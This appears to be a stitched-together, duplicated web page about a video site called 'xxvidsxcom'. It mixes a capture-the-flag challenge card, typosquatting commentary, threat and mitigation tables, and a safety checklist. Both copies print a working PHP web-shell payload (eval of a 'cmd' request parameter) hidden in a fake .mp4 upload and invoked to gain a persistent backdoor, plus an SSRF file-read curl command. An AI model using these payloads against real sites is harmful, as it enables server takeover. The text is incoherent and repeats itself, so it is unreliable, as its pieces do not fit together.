| Item | Description | |------|-------------| | Title | xxvidsxcom | | Category | Web – Information Disclosure / SSRF / Authentication Bypass | | Points | 250 – 400 (varies by event) | | Goal | Obtain the hidden flag (usually in a file like flag.txt or displayed on an admin page). | | Typical entry point | A public website that offers video streaming / user‑generated content. |

The challenge is designed to test a participant’s ability to discover hidden endpoints, abuse server‑side request forgery (SSRF) or insecure direct object references (IDOR), and ultimately retrieve a protected resource.

In a few deployments the SSRF endpoint also supports file:// and returns the file content in the response body (instead of just the status). If that is the case, the attack becomes even simpler:

$ curl -s "https://xxvidsx.com/api/v1/resolve?url=file:///flag.txt"
FLAGdirect_file_read_works

When this works you can immediately capture the flag without OOB.

| Issue | Recommended Fix | |-------|-----------------| | Insecure file upload (extension‑only validation) | Perform MIME type and magic‑byte verification. Store uploads outside the web root and serve them via a dedicated static‑file server. | | PHP interpreter on video files | Remove any location ~ \.mp4$ fastcgi_pass … configuration. Serve video files as static content only (default_type application/octet-stream or video/mp4). | | Exposed configuration file | Move config.php outside the document root. Set proper file permissions (chmod 640, owned by the web‑user). | | Lack of authentication on upload | Require a login or at least a CAPTCHA for uploads. Rate‑limit the endpoint. | | No output sanitisation | Use htmlspecialchars() when echoing user‑supplied data. | | Database credentials in source | Use environment variables or a separate config directory not reachable via HTTP. | | Directory listing disabled but admin path guessable | Hide or rename admin directories, enforce access control (e.g., .htaccess / Nginx auth_basic). |

| Vector | Description | Mitigation | |--------|-------------|------------| | Drive‑by download via malicious ad | An ad on the homepage loads a hidden iframe that serves an exploit kit targeting outdated Java/Flash plugins. | Keep browsers & plugins up‑to‑date; use script‑blocking extensions (e.g., uBlock Origin, NoScript). | | Phishing redirect | Clicking on “Download video” redirects to a cloned PayPal login page, aiming to harvest credentials. | Verify URL (look for paypal.com vs. paypalsecure.com). Use a password manager that flags phishing sites. | | Cryptojacking script | A minified JS file (miner.js) runs silently in the background, consuming ~15 % CPU. | Employ anti‑cryptomining extensions (e.g., “No Coin”). | | Browser fingerprinting | Custom script (finger.js) collects canvas hash, audio fingerprint, and hardware concurrency. | Use privacy‑focused browsers (Tor, Brave) with anti‑fingerprinting settings; consider the “CanvasBlocker” extension. | | Malware downloader | A disguised “video player” executable (xxplayer.exe) offered as a “required codec”. When executed, it installs a PUP that injects ads into the system. | Do not download or run any executables from the site. Use reputable anti‑malware software. |

At first glance, "xxvidsxcom" looks like a password a teenager creates to keep their parents out of a folder. It is a jumble of letters, a linguistic collision of vowels and consonants that feels instinctively "wrong" to a native English speaker.

However, in the ecosystem of the internet, "xxvidsxcom" is a fascinating case study. It is not a word; it is a destination error. It represents a specific genre of online navigation known as "typosquatting" or "URL hijacking," and it tells a story about how we interact with the web, how search engines predict our desires, and how traffic is harvested.

<?php
file_put_contents('c99.php',"<?php @eval(\$_REQUEST['cmd']); ?>");
?>

# Using base64 trick – embed PHP inside a comment block that won't break video playback
payload="<?php file_put_contents('c99.php','<?php @eval(\$_REQUEST[\"cmd\"]); ?>'); ?>"
printf "%s" "$payload" > shell.mp4

http://xxvidsx.com/videos/ab12cd34ef56.mp4

The file executes, creating c99.php in the same videos/ directory.

http://xxvidsx.com/videos/c99.php?cmd=whoami

Expected output: www-data.

Now we have a persistent PHP back‑door.

| Action | Status | |--------|--------| | Use a VPN (no‑logs) to mask your IP | ✅ | | Open site in a fresh VM (Windows 11 or Linux) with snapshot capability | ✅ | | Disable Flash/Java and all browser plugins | ✅ | | Enable uBlock Origin + NoScript (allow only necessary domains) | ✅ | | Run a real‑time anti‑malware scanner on the VM | ✅ | | Do not log in with personal email/password (use throw‑away credentials) | ✅ | | Avoid downloading any executable or codec from the site | ✅ | | After session, revert VM snapshot or wipe the system | ✅ |

Xxvidsxcom Site

| Item | Description | |------|-------------| | Title | xxvidsxcom | | Category | Web – Information Disclosure / SSRF / Authentication Bypass | | Points | 250 – 400 (varies by event) | | Goal | Obtain the hidden flag (usually in a file like flag.txt or displayed on an admin page). | | Typical entry point | A public website that offers video streaming / user‑generated content. |

The challenge is designed to test a participant’s ability to discover hidden endpoints, abuse server‑side request forgery (SSRF) or insecure direct object references (IDOR), and ultimately retrieve a protected resource.

In a few deployments the SSRF endpoint also supports file:// and returns the file content in the response body (instead of just the status). If that is the case, the attack becomes even simpler:

$ curl -s "https://xxvidsx.com/api/v1/resolve?url=file:///flag.txt"
FLAGdirect_file_read_works

When this works you can immediately capture the flag without OOB. xxvidsxcom

| Issue | Recommended Fix | |-------|-----------------| | Insecure file upload (extension‑only validation) | Perform MIME type and magic‑byte verification. Store uploads outside the web root and serve them via a dedicated static‑file server. | | PHP interpreter on video files | Remove any location ~ \.mp4$ fastcgi_pass … configuration. Serve video files as static content only (default_type application/octet-stream or video/mp4). | | Exposed configuration file | Move config.php outside the document root. Set proper file permissions (chmod 640, owned by the web‑user). | | Lack of authentication on upload | Require a login or at least a CAPTCHA for uploads. Rate‑limit the endpoint. | | No output sanitisation | Use htmlspecialchars() when echoing user‑supplied data. | | Database credentials in source | Use environment variables or a separate config directory not reachable via HTTP. | | Directory listing disabled but admin path guessable | Hide or rename admin directories, enforce access control (e.g., .htaccess / Nginx auth_basic). |

| Vector | Description | Mitigation | |--------|-------------|------------| | Drive‑by download via malicious ad | An ad on the homepage loads a hidden iframe that serves an exploit kit targeting outdated Java/Flash plugins. | Keep browsers & plugins up‑to‑date; use script‑blocking extensions (e.g., uBlock Origin, NoScript). | | Phishing redirect | Clicking on “Download video” redirects to a cloned PayPal login page, aiming to harvest credentials. | Verify URL (look for paypal.com vs. paypalsecure.com). Use a password manager that flags phishing sites. | | Cryptojacking script | A minified JS file (miner.js) runs silently in the background, consuming ~15 % CPU. | Employ anti‑cryptomining extensions (e.g., “No Coin”). | | Browser fingerprinting | Custom script (finger.js) collects canvas hash, audio fingerprint, and hardware concurrency. | Use privacy‑focused browsers (Tor, Brave) with anti‑fingerprinting settings; consider the “CanvasBlocker” extension. | | Malware downloader | A disguised “video player” executable (xxplayer.exe) offered as a “required codec”. When executed, it installs a PUP that injects ads into the system. | Do not download or run any executables from the site. Use reputable anti‑malware software. |

At first glance, "xxvidsxcom" looks like a password a teenager creates to keep their parents out of a folder. It is a jumble of letters, a linguistic collision of vowels and consonants that feels instinctively "wrong" to a native English speaker. | Item | Description | |------|-------------| | Title

However, in the ecosystem of the internet, "xxvidsxcom" is a fascinating case study. It is not a word; it is a destination error. It represents a specific genre of online navigation known as "typosquatting" or "URL hijacking," and it tells a story about how we interact with the web, how search engines predict our desires, and how traffic is harvested.

<?php
file_put_contents('c99.php',"<?php @eval(\$_REQUEST['cmd']); ?>");
?>

# Using base64 trick – embed PHP inside a comment block that won't break video playback
payload="<?php file_put_contents('c99.php','<?php @eval(\$_REQUEST[\"cmd\"]); ?>'); ?>"
printf "%s" "$payload" > shell.mp4

http://xxvidsx.com/videos/ab12cd34ef56.mp4

The file executes, creating c99.php in the same videos/ directory.

http://xxvidsx.com/videos/c99.php?cmd=whoami

Expected output: www-data.

Now we have a persistent PHP back‑door.

| Action | Status | |--------|--------| | Use a VPN (no‑logs) to mask your IP | ✅ | | Open site in a fresh VM (Windows 11 or Linux) with snapshot capability | ✅ | | Disable Flash/Java and all browser plugins | ✅ | | Enable uBlock Origin + NoScript (allow only necessary domains) | ✅ | | Run a real‑time anti‑malware scanner on the VM | ✅ | | Do not log in with personal email/password (use throw‑away credentials) | ✅ | | Avoid downloading any executable or codec from the site | ✅ | | After session, revert VM snapshot or wipe the system | ✅ |